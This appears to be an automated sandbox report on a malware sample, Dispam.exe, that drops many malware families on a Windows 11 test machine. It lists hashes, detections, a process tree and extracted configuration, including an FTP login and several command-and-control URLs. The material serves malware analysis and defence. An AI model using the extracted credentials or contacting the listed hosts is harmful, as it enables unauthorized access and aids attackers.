ardamax | fd111c335073ae9b9f33d1f3e348bcbc46dd0b90de333156c2dbbee62412374b

Analysis

max time kernel
148s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
19-09-2024 07:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dispam.exe
Size

12.1MB
MD5

a89b5a734cced64ae3cc202bdfac8759
SHA1

81a4254491dd554a5113f63ad7849d93cc30d3d7
SHA256

fd111c335073ae9b9f33d1f3e348bcbc46dd0b90de333156c2dbbee62412374b
SHA512

68ac8b1e4739fb444f1ef055015455094a3c768c84e96279996a11a9e1a4e7ae2192acb862cd896844c01cbed24e3fc0868fa8891d4806a46e70e2e3e2175e73
SSDEEP

393216:0GV2CSQhZ2YsHFUK2Jn1+TtIiFQS2NXNsI8VbTToP:TYQZ2YwUlJn1QtIm28IKzo

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
chernikova-a-v.my1.ru
Port:
21
Username:
5chernikova-a-v
Password:
8910743

Extracted

Family

berbew

http://tat-neftbank.ru/kkq.php

http://tat-neftbank.ru/wcmd.htm

http://crutop.nu/index.php

http://crutop.ru/index.php

http://mazafaka.ru/index.php

http://color-bank.ru/index.php

http://asechka.ru/index.php

http://trojan.ru/index.php

http://fuck.ru/index.php

http://goldensand.ru/index.php

http://filesearch.ru/index.php

http://devx.nm.ru/index.php

http://ros-neftbank.ru/index.php

http://lovingod.host.sk/index.php

http://www.redline.ru/index.php

http://cvv.ru/index.php

http://hackers.lv/index.php

http://fethard.biz/index.php

http://ldark.nm.ru/index.htm

http://gaz-prom.ru/index.htm

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

http://klkjwre77638dfqwieuoi888.info/

Extracted

Family

latentbot

gfaghrtehxvdfsqaj.zapto.org

1gfaghrtehxvdfsqaj.zapto.org

2gfaghrtehxvdfsqaj.zapto.org

3gfaghrtehxvdfsqaj.zapto.org

6gfaghrtehxvdfsqaj.zapto.org

4gfaghrtehxvdfsqaj.zapto.org

5gfaghrtehxvdfsqaj.zapto.org

Signatures

Ardamax
A keylogger first seen in 2013.
keylogger stealer ardamax

Ardamax main executable 1 IoCs

resource	yara_rule
behavioral1/files/0x000100000002ad2a-2599.dat	family_ardamax

Berbew
Berbew is a backdoor written in C++.
backdoor berbew
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Cobalt Strike reflective loader 1 IoCs

Detects the reflective loader used by Cobalt Strike.

resource	yara_rule
behavioral1/files/0x000200000002acc8-1415.dat	cobalt_reflective_dll

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike

Detect Blackmoon payload 8 IoCs

resource	yara_rule
behavioral1/memory/7332-998-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/6320-1529-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5640-1527-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/9112-1460-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/8540-1298-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/4544-1188-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/5212-852-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon
behavioral1/memory/4916-2110-0x0000000000400000-0x0000000000429000-memory.dmp	family_blackmoon

Detect XtremeRAT payload 2 IoCs

resource	yara_rule
behavioral1/memory/3720-1904-0x0000000010000000-0x0000000010048000-memory.dmp	family_xtremerat
behavioral1/memory/4952-695-0x0000000000C80000-0x0000000000C95000-memory.dmp	family_xtremerat

Detects MyDoom family 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002af27-3140.dat	family_mydoom
behavioral1/memory/404-205-0x0000000000800000-0x000000000080A000-memory.dmp	family_mydoom

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
LatentBot
Modular trojan written in Delphi which has been in-the-wild since 2013.
trojan latentbot
MyDoom
MyDoom is a Worm that is written in C++.
worm mydoom
Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
XtremeRAT
The XtremeRAT was developed by xtremecoder and has been available since at least 2010, and written in Delphi.
persistence spyware rat xtremerat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
14920	powershell.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000100000002b20e-7616.dat	aspack_v212_v242

Loads dropped DLL 20 IoCs

pid	Process
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe
4412	Dispam.exe

UPX packed file 25 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/7332-998-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/6320-1529-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5640-1527-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/9112-1460-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/files/0x000200000002acc8-1415.dat	upx
behavioral1/files/0x000100000002ac4a-1411.dat	upx
behavioral1/memory/8540-1298-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/4544-1188-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/5212-852-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/4952-695-0x0000000000C80000-0x0000000000C95000-memory.dmp	upx
behavioral1/memory/660-325-0x0000000000400000-0x000000000040A000-memory.dmp	upx
behavioral1/memory/4916-2110-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/files/0x000100000002ae7b-2568.dat	upx
behavioral1/files/0x000100000002b15e-4471.dat	upx
behavioral1/files/0x000100000002b13c-4465.dat	upx
behavioral1/files/0x000100000002b1b4-4880.dat	upx
behavioral1/files/0x000100000002b1cb-5089.dat	upx
behavioral1/files/0x000100000002b1c6-5377.dat	upx
behavioral1/files/0x000100000002ae01-2218.dat	upx
behavioral1/memory/9952-1706-0x00000000031E0000-0x000000000426E000-memory.dmp	upx
behavioral1/memory/4952-207-0x0000000000C80000-0x0000000000C95000-memory.dmp	upx
behavioral1/memory/660-172-0x0000000000400000-0x000000000040A000-memory.dmp	upx
behavioral1/files/0x000100000002b2db-6931.dat	upx
behavioral1/files/0x000100000002b63b-11221.dat	upx
behavioral1/files/0x000300000002aca7-11938.dat	upx

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs

Web Service

T1102

flow	ioc
299	discord.com
305	discord.com
335	discord.com
372	discord.com
1	pastebin.com
267	raw.githubusercontent.com
268	discord.com
273	discord.com
285	raw.githubusercontent.com
291	discord.com
319	discord.com
365	discord.com
2	pastebin.com
215	discord.com
230	discord.com
202	discord.com
294	discord.com
325	discord.com
368	discord.com
278	discord.com
309	discord.com
313	discord.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
23772	Process not Found
23596	Process not Found
21792	Process not Found
32408	Process not Found
9068	Process not Found
11296	Process not Found
20656	Process not Found
23276	Process not Found

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000100000002b553-10377.dat	pyinstaller

Program crash 16 IoCs

pid	pid_target	Process	procid_target
10700	8484	WerFault.exe
10368	944	WerFault.exe	236
7336	1600	WerFault.exe	89
8980	9688	WerFault.exe	330
13268	14624	Process not Found	1273
26192	7916	Process not Found	1292
26992	7376	Process not Found	187
30340	28856	Process not Found
30136	28856	Process not Found
14132	14624	Process not Found	1273
26852	4864	Process not Found	86
33116	9600	Process not Found	323
35372	9776	Process not Found	337
38552	5168	Process not Found	295
10996	13084	Process not Found
32180	14144	Process not Found	696

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
8568	Process not Found

System Time Discovery 1 TTPs 6 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
6608	Process not Found
18132	Process not Found
24380	Process not Found
21836	Process not Found
26812	Process not Found
23112	Process not Found

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
1784	Process not Found
19260	Process not Found
34260	Process not Found
37252	Process not Found

Runs net.exe

Runs regedit.exe 1 IoCs

pid	Process
26632	Process not Found

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2720 wrote to memory of 4412	2720	Dispam.exe	82
PID 2720 wrote to memory of 4412	2720	Dispam.exe	82
PID 4412 wrote to memory of 4888	4412	Dispam.exe	700
PID 4412 wrote to memory of 4888	4412	Dispam.exe	700

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5780	Process not Found

C:\Users\Admin\AppData\Local\Temp\Dispam.exe
"C:\Users\Admin\AppData\Local\Temp\Dispam.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Users\Admin\AppData\Local\Temp\Dispam.exe
  "C:\Users\Admin\AppData\Local\Temp\Dispam.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4888
- - C:\Users\Admin\Downloads\240919-h9qejsxejnBackdoor.Win32.Padodor.SK.MTB-3d2c8cecc7dd3105ff7544d0cf26795c7a7a64dc89ed7b66af8e7e1443f2893dN
    C:\Users\Admin\Downloads\240919-h9qejsxejnBackdoor.Win32.Padodor.SK.MTB-3d2c8cecc7dd3105ff7544d0cf26795c7a7a64dc89ed7b66af8e7e1443f2893dN
    3⤵
    PID:4680
  - - C:\Windows\SysWOW64\Cagobalc.exe
      C:\Windows\system32\Cagobalc.exe
      4⤵
      PID:1216
    - - C:\Windows\SysWOW64\Cajlhqjp.exe
        
        C:\Windows\system32\Cajlhqjp.exe
        5⤵
        
        PID:1956
      - C:\Windows\SysWOW64\Dfknkg32.exe
        
        C:\Windows\system32\Dfknkg32.exe
        6⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\Dkkcge32.exe
        
        C:\Windows\system32\Dkkcge32.exe
        7⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\Ekbihd32.exe
        
        C:\Windows\system32\Ekbihd32.exe
        8⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\Eaakpm32.exe
        
        C:\Windows\system32\Eaakpm32.exe
        9⤵
        
        PID:6616
        
        C:\Windows\SysWOW64\Fddqghpd.exe
        
        C:\Windows\system32\Fddqghpd.exe
        10⤵
        
        PID:7048
        
        C:\Windows\SysWOW64\Fkeodaai.exe
        
        C:\Windows\system32\Fkeodaai.exe
        11⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\Hdicienl.exe
        
        C:\Windows\system32\Hdicienl.exe
        12⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\Hgoeep32.exe
        
        C:\Windows\system32\Hgoeep32.exe
        13⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\Ifdonfka.exe
        
        C:\Windows\system32\Ifdonfka.exe
        14⤵
        
        PID:7476
        
        C:\Windows\SysWOW64\Jnkcogno.exe
        
        C:\Windows\system32\Jnkcogno.exe
        15⤵
        
        PID:8660
        
        C:\Windows\SysWOW64\Kflnfcgg.exe
        
        C:\Windows\system32\Kflnfcgg.exe
        16⤵
        
        PID:7812
        
        C:\Windows\SysWOW64\Lehaho32.exe
        
        C:\Windows\system32\Lehaho32.exe
        17⤵
        
        PID:6796
        
        C:\Windows\SysWOW64\Miomdk32.exe
        
        C:\Windows\system32\Miomdk32.exe
        18⤵
        
        PID:9360
        
        C:\Windows\SysWOW64\Ngdfdmdi.exe
        
        C:\Windows\system32\Ngdfdmdi.exe
        19⤵
        
        PID:8656
        
        C:\Windows\SysWOW64\Poaqemao.exe
        
        C:\Windows\system32\Poaqemao.exe
        20⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\Biadeoce.exe
        
        C:\Windows\system32\Biadeoce.exe
        21⤵
        
        PID:11360
        
        C:\Windows\SysWOW64\Fhmigagd.exe
        
        C:\Windows\system32\Fhmigagd.exe
        22⤵
        
        PID:8600
        
        C:\Windows\SysWOW64\Lkabjbih.exe
        
        C:\Windows\system32\Lkabjbih.exe
        23⤵
        
        PID:15300
        
        C:\Windows\SysWOW64\Bjnmpl32.exe
        
        C:\Windows\system32\Bjnmpl32.exe
        24⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\Kglmio32.exe
        
        C:\Windows\system32\Kglmio32.exe
        25⤵
        
        PID:18600
- - C:\Users\Admin\Downloads\240919-h8prmaxdnrf37c0529a6002d6489bbee45e59035a5407a5d110768cc5f8d791b1134d7810fN.exe
    C:\Users\Admin\Downloads\240919-h8prmaxdnrf37c0529a6002d6489bbee45e59035a5407a5d110768cc5f8d791b1134d7810fN.exe
    3⤵
    PID:4512
  - - C:\Windows\SysWOW64\Cmlcbbcj.exe
      C:\Windows\system32\Cmlcbbcj.exe
      4⤵
      PID:3408
    - - C:\Windows\SysWOW64\Cnkplejl.exe
        
        C:\Windows\system32\Cnkplejl.exe
        5⤵
        
        PID:4468
      - C:\Windows\SysWOW64\Danecp32.exe
        
        C:\Windows\system32\Danecp32.exe
        6⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\Ddakjkqi.exe
        
        C:\Windows\system32\Ddakjkqi.exe
        7⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\Emoinpcd.exe
        
        C:\Windows\system32\Emoinpcd.exe
        8⤵
        
        PID:1512
        
        C:\Windows\SysWOW64\Ekgbccni.exe
        
        C:\Windows\system32\Ekgbccni.exe
        9⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\Fgppmd32.exe
        
        C:\Windows\system32\Fgppmd32.exe
        10⤵
        
        PID:6952
        
        C:\Windows\SysWOW64\Fefjfked.exe
        
        C:\Windows\system32\Fefjfked.exe
        11⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\Gadqlkep.exe
        
        C:\Windows\system32\Gadqlkep.exe
        12⤵
        
        PID:7592
        
        C:\Windows\SysWOW64\Hheoid32.exe
        
        C:\Windows\system32\Hheoid32.exe
        13⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\Hkjafn32.exe
        
        C:\Windows\system32\Hkjafn32.exe
        14⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\Idjlpc32.exe
        
        C:\Windows\system32\Idjlpc32.exe
        15⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\Kppici32.exe
        
        C:\Windows\system32\Kppici32.exe
        16⤵
        
        PID:9000
- - C:\Users\Admin\Downloads\240919-h8xr8sxbmbead8622597de71be8384b3849c20216f_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h8xr8sxbmbead8622597de71be8384b3849c20216f_JaffaCakes118.exe
    3⤵
    PID:4864
- - C:\Users\Admin\Downloads\240919-h5m4maxclread6112ec379a1e9b2d65067292a368c_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h5m4maxclread6112ec379a1e9b2d65067292a368c_JaffaCakes118.exe
    3⤵
    PID:2316
- - C:\Users\Admin\Downloads\240919-h6ylraxcrj9f4d2ae930708049f4b897298c958d0c623b8e042fc36eaabd1ea46dcf71f37cN.exe
    C:\Users\Admin\Downloads\240919-h6ylraxcrj9f4d2ae930708049f4b897298c958d0c623b8e042fc36eaabd1ea46dcf71f37cN.exe
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\Cagobalc.exe
      C:\Windows\system32\Cagobalc.exe
      4⤵
      PID:3000
    - - C:\Windows\SysWOW64\Ceehho32.exe
        
        C:\Windows\system32\Ceehho32.exe
        5⤵
        
        PID:5128
      - C:\Windows\SysWOW64\Dejacond.exe
        
        C:\Windows\system32\Dejacond.exe
        6⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\Dfpgffpm.exe
        
        C:\Windows\system32\Dfpgffpm.exe
        7⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\Edhakj32.exe
        
        C:\Windows\system32\Edhakj32.exe
        8⤵
        
        PID:1472
        
        C:\Windows\SysWOW64\Eobocb32.exe
        
        C:\Windows\system32\Eobocb32.exe
        9⤵
        
        PID:6580
        
        C:\Windows\SysWOW64\Foghnabl.exe
        
        C:\Windows\system32\Foghnabl.exe
        10⤵
        
        PID:6988
        
        C:\Windows\SysWOW64\Fdijbg32.exe
        
        C:\Windows\system32\Fdijbg32.exe
        11⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\Gepmlimi.exe
        
        C:\Windows\system32\Gepmlimi.exe
        12⤵
        
        PID:7628
        
        C:\Windows\SysWOW64\Ggcfja32.exe
        
        C:\Windows\system32\Ggcfja32.exe
        13⤵
        
        PID:8140
        
        C:\Windows\SysWOW64\Hfningai.exe
        
        C:\Windows\system32\Hfningai.exe
        14⤵
        
        PID:6708
- - C:\Users\Admin\Downloads\240919-h61q4sxamgead71c505734fcc3c9f7b6a29cd8cfdc_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h61q4sxamgead71c505734fcc3c9f7b6a29cd8cfdc_JaffaCakes118.exe
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 304
      4⤵
      Program crash
      PID:7336
- - C:\Users\Admin\Downloads\240919-h8shhsxdpqead8582ec4b0766164a7ba5438057ede_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h8shhsxdpqead8582ec4b0766164a7ba5438057ede_JaffaCakes118.exe
    3⤵
    PID:1016
- - C:\Users\Admin\Downloads\240919-h57g9sxajhead69243fc7b937c94297715b1911ff2_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h57g9sxajhead69243fc7b937c94297715b1911ff2_JaffaCakes118.exe
    3⤵
    PID:2548
- - C:\Users\Admin\Downloads\240919-h9jl1axdrr50c60af3e69ebef8d3e9dd9ca0c94f524500cfdcf694fc43366385ed155466afN.exe
    C:\Users\Admin\Downloads\240919-h9jl1axdrr50c60af3e69ebef8d3e9dd9ca0c94f524500cfdcf694fc43366385ed155466afN.exe
    3⤵
    PID:2076
  - - C:\Windows\SysWOW64\Chcddk32.exe
      C:\Windows\system32\Chcddk32.exe
      4⤵
      PID:5172
    - - C:\Windows\SysWOW64\Dmefhako.exe
        
        C:\Windows\system32\Dmefhako.exe
        5⤵
        
        PID:5572
      - C:\Windows\SysWOW64\Daekdooc.exe
        
        C:\Windows\system32\Daekdooc.exe
        6⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\Eehnem32.exe
        
        C:\Windows\system32\Eehnem32.exe
        7⤵
        
        PID:6264
        
        C:\Windows\SysWOW64\Egnchd32.exe
        
        C:\Windows\system32\Egnchd32.exe
        8⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\Fojedapj.exe
        
        C:\Windows\system32\Fojedapj.exe
        9⤵
        
        PID:7156
        
        C:\Windows\SysWOW64\Gekcaj32.exe
        
        C:\Windows\system32\Gekcaj32.exe
        10⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\Goljqnpd.exe
        
        C:\Windows\system32\Goljqnpd.exe
        11⤵
        
        PID:8084
        
        C:\Windows\SysWOW64\Hkhdqoac.exe
        
        C:\Windows\system32\Hkhdqoac.exe
        12⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\Ibkpcg32.exe
        
        C:\Windows\system32\Ibkpcg32.exe
        13⤵
        
        PID:7612
        
        C:\Windows\SysWOW64\Jkmgblok.exe
        
        C:\Windows\system32\Jkmgblok.exe
        14⤵
        
        PID:8624
        
        C:\Windows\SysWOW64\Kbpbed32.exe
        
        C:\Windows\system32\Kbpbed32.exe
        15⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\Lfealaol.exe
        
        C:\Windows\system32\Lfealaol.exe
        16⤵
        
        PID:6732
        
        C:\Windows\SysWOW64\Mfaqhp32.exe
        
        C:\Windows\system32\Mfaqhp32.exe
        17⤵
        
        PID:9340
        
        C:\Windows\SysWOW64\Nomncpcg.exe
        
        C:\Windows\system32\Nomncpcg.exe
        18⤵
        
        PID:5788
- - C:\Users\Admin\Downloads\240919-h7pegaxaqaead7b5029858eab5ee327685e6f97b30_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h7pegaxaqaead7b5029858eab5ee327685e6f97b30_JaffaCakes118.exe
    3⤵
    PID:660
  - - C:\Windows\SysWOW64\rundll32.exe
      rundll32 "C:\Program Files\Messenger\msgmr.dll",UIMessage
      4⤵
      PID:940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\system32\unxxx.bat"
      4⤵
      PID:3376
- - C:\Users\Admin\Downloads\240919-h9fv4sxbpa6ac0b6bad67336c1d1f99aa2a8365590bb5d347191f041ab48e1fe9b29fc23d3N.exe
    C:\Users\Admin\Downloads\240919-h9fv4sxbpa6ac0b6bad67336c1d1f99aa2a8365590bb5d347191f041ab48e1fe9b29fc23d3N.exe
    3⤵
    PID:4736
  - - C:\Windows\SysWOW64\Cfpnph32.exe
      C:\Windows\system32\Cfpnph32.exe
      4⤵
      PID:1656
    - - C:\Windows\SysWOW64\Chagok32.exe
        
        C:\Windows\system32\Chagok32.exe
        5⤵
        
        PID:3400
      - C:\Windows\SysWOW64\Calhnpgn.exe
        
        C:\Windows\system32\Calhnpgn.exe
        6⤵
        
        PID:5268
        
        C:\Windows\SysWOW64\Dfnjafap.exe
        
        C:\Windows\system32\Dfnjafap.exe
        7⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\Dahhio32.exe
        
        C:\Windows\system32\Dahhio32.exe
        8⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\Emcbio32.exe
        
        C:\Windows\system32\Emcbio32.exe
        9⤵
        
        PID:6412
        
        C:\Windows\SysWOW64\Emhldnkj.exe
        
        C:\Windows\system32\Emhldnkj.exe
        10⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\Fdfmlhna.exe
        
        C:\Windows\system32\Fdfmlhna.exe
        11⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\Gochjpho.exe
        
        C:\Windows\system32\Gochjpho.exe
        12⤵
        
        PID:7292
        
        C:\Windows\SysWOW64\Gkobjpin.exe
        
        C:\Windows\system32\Gkobjpin.exe
        13⤵
        
        PID:8016
        
        C:\Windows\SysWOW64\Hkhdqoac.exe
        
        C:\Windows\system32\Hkhdqoac.exe
        14⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\Iomcgl32.exe
        
        C:\Windows\system32\Iomcgl32.exe
        15⤵
        
        PID:8740
- - C:\Users\Admin\Downloads\240919-h7lnksxdkn62e86f8458c51a7e99701a6ca8923bb51065692e74cbb49b0adbd7ce1c686e05N.exe
    C:\Users\Admin\Downloads\240919-h7lnksxdkn62e86f8458c51a7e99701a6ca8923bb51065692e74cbb49b0adbd7ce1c686e05N.exe
    3⤵
    PID:1036
  - - C:\Windows\SysWOW64\Dobfld32.exe
      C:\Windows\system32\Dobfld32.exe
      4⤵
      PID:5944
    - - C:\Windows\SysWOW64\Eonehbjg.exe
        
        C:\Windows\system32\Eonehbjg.exe
        5⤵
        
        PID:6192
      - C:\Windows\SysWOW64\Edpgli32.exe
        
        C:\Windows\system32\Edpgli32.exe
        6⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\Fhpmgg32.exe
        
        C:\Windows\system32\Fhpmgg32.exe
        7⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\Foqkdp32.exe
        
        C:\Windows\system32\Foqkdp32.exe
        8⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\Ggcfja32.exe
        
        C:\Windows\system32\Ggcfja32.exe
        9⤵
        
        PID:8156
        
        C:\Windows\SysWOW64\Hdpiid32.exe
        
        C:\Windows\system32\Hdpiid32.exe
        10⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\Idgojc32.exe
        
        C:\Windows\system32\Idgojc32.exe
        11⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\Jgakbm32.exe
        
        C:\Windows\system32\Jgakbm32.exe
        12⤵
        
        PID:8604
        
        C:\Windows\SysWOW64\Klfjijgq.exe
        
        C:\Windows\system32\Klfjijgq.exe
        13⤵
        
        PID:9184
        
        C:\Windows\SysWOW64\Lnnikdnj.exe
        
        C:\Windows\system32\Lnnikdnj.exe
        14⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\Mhbmphjm.exe
        
        C:\Windows\system32\Mhbmphjm.exe
        15⤵
        
        PID:9348
        
        C:\Windows\SysWOW64\Nchjdo32.exe
        
        C:\Windows\system32\Nchjdo32.exe
        16⤵
        
        PID:9012
        
        C:\Windows\SysWOW64\Ppopjp32.exe
        
        C:\Windows\system32\Ppopjp32.exe
        17⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\Bjodjb32.exe
        
        C:\Windows\system32\Bjodjb32.exe
        18⤵
        
        PID:11320
        
        C:\Windows\SysWOW64\Fdamgb32.exe
        
        C:\Windows\system32\Fdamgb32.exe
        19⤵
        
        PID:13264
        
        C:\Windows\SysWOW64\Lkabjbih.exe
        
        C:\Windows\system32\Lkabjbih.exe
        20⤵
        
        PID:15288
        
        C:\Windows\SysWOW64\Bhoqeibl.exe
        
        C:\Windows\system32\Bhoqeibl.exe
        21⤵
        
        PID:14324
        
        C:\Windows\SysWOW64\Kcndbp32.exe
        
        C:\Windows\system32\Kcndbp32.exe
        22⤵
        
        PID:14244
- - C:\Users\Admin\Downloads\240919-h777ksxbjcead807b200627ec519ce6eb85d6acb8f_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h777ksxbjcead807b200627ec519ce6eb85d6acb8f_JaffaCakes118.exe
    3⤵
    PID:3720
- - C:\Users\Admin\Downloads\240919-h6t9bsxambead701f1b4304adb4472b04abda18317_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h6t9bsxambead701f1b4304adb4472b04abda18317_JaffaCakes118.exe
    3⤵
    PID:404
- - C:\Users\Admin\Downloads\240919-h6cpaaxcpmcb5983d78fde99c83b5b628b485f7787324d737a9dae74824a88c6bad99ed7d8N.exe
    C:\Users\Admin\Downloads\240919-h6cpaaxcpmcb5983d78fde99c83b5b628b485f7787324d737a9dae74824a88c6bad99ed7d8N.exe
    3⤵
    PID:3584
  - - C:\Windows\SysWOW64\Dobfld32.exe
      C:\Windows\system32\Dobfld32.exe
      4⤵
      PID:5540
    - - C:\Windows\SysWOW64\Dogogcpo.exe
        
        C:\Windows\system32\Dogogcpo.exe
        5⤵
        
        PID:5980
      - C:\Windows\SysWOW64\Ealadnik.exe
        
        C:\Windows\system32\Ealadnik.exe
        6⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\Ehkclgmb.exe
        
        C:\Windows\system32\Ehkclgmb.exe
        7⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\Fgbmccpg.exe
        
        C:\Windows\system32\Fgbmccpg.exe
        8⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\Fnckpmql.exe
        
        C:\Windows\system32\Fnckpmql.exe
        9⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\Gdgfce32.exe
        
        C:\Windows\system32\Gdgfce32.exe
        10⤵
        
        PID:7996
        
        C:\Windows\SysWOW64\Hdnldd32.exe
        
        C:\Windows\system32\Hdnldd32.exe
        11⤵
        
        PID:3708
- - C:\Users\Admin\Downloads\240919-hy83hswfrcc9e2bc8cc2dc92a63f6e84f6d25f78fbb9b89a23f8d49c6dbb766e814a460073N.exe
    C:\Users\Admin\Downloads\240919-hy83hswfrcc9e2bc8cc2dc92a63f6e84f6d25f78fbb9b89a23f8d49c6dbb766e814a460073N.exe
    3⤵
    PID:4508
- - C:\Users\Admin\Downloads\240919-h3kkqawhkgead49efd7212c6db7581dd0a0289da0d_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-h3kkqawhkgead49efd7212c6db7581dd0a0289da0d_JaffaCakes118.exe
    3⤵
    PID:4952
- - C:\Users\Admin\Downloads\240919-h7tn7axdkraf5c1aecdf2c9ff8eb828850f1f0041cb5859df01a3261781aa65898a2777484N.exe
    C:\Users\Admin\Downloads\240919-h7tn7axdkraf5c1aecdf2c9ff8eb828850f1f0041cb5859df01a3261781aa65898a2777484N.exe
    3⤵
    PID:2964
  - - C:\Windows\SysWOW64\Delnin32.exe
      C:\Windows\system32\Delnin32.exe
      4⤵
      PID:5608
    - - C:\Windows\SysWOW64\Dknpmdfc.exe
        
        C:\Windows\system32\Dknpmdfc.exe
        5⤵
        
        PID:6076
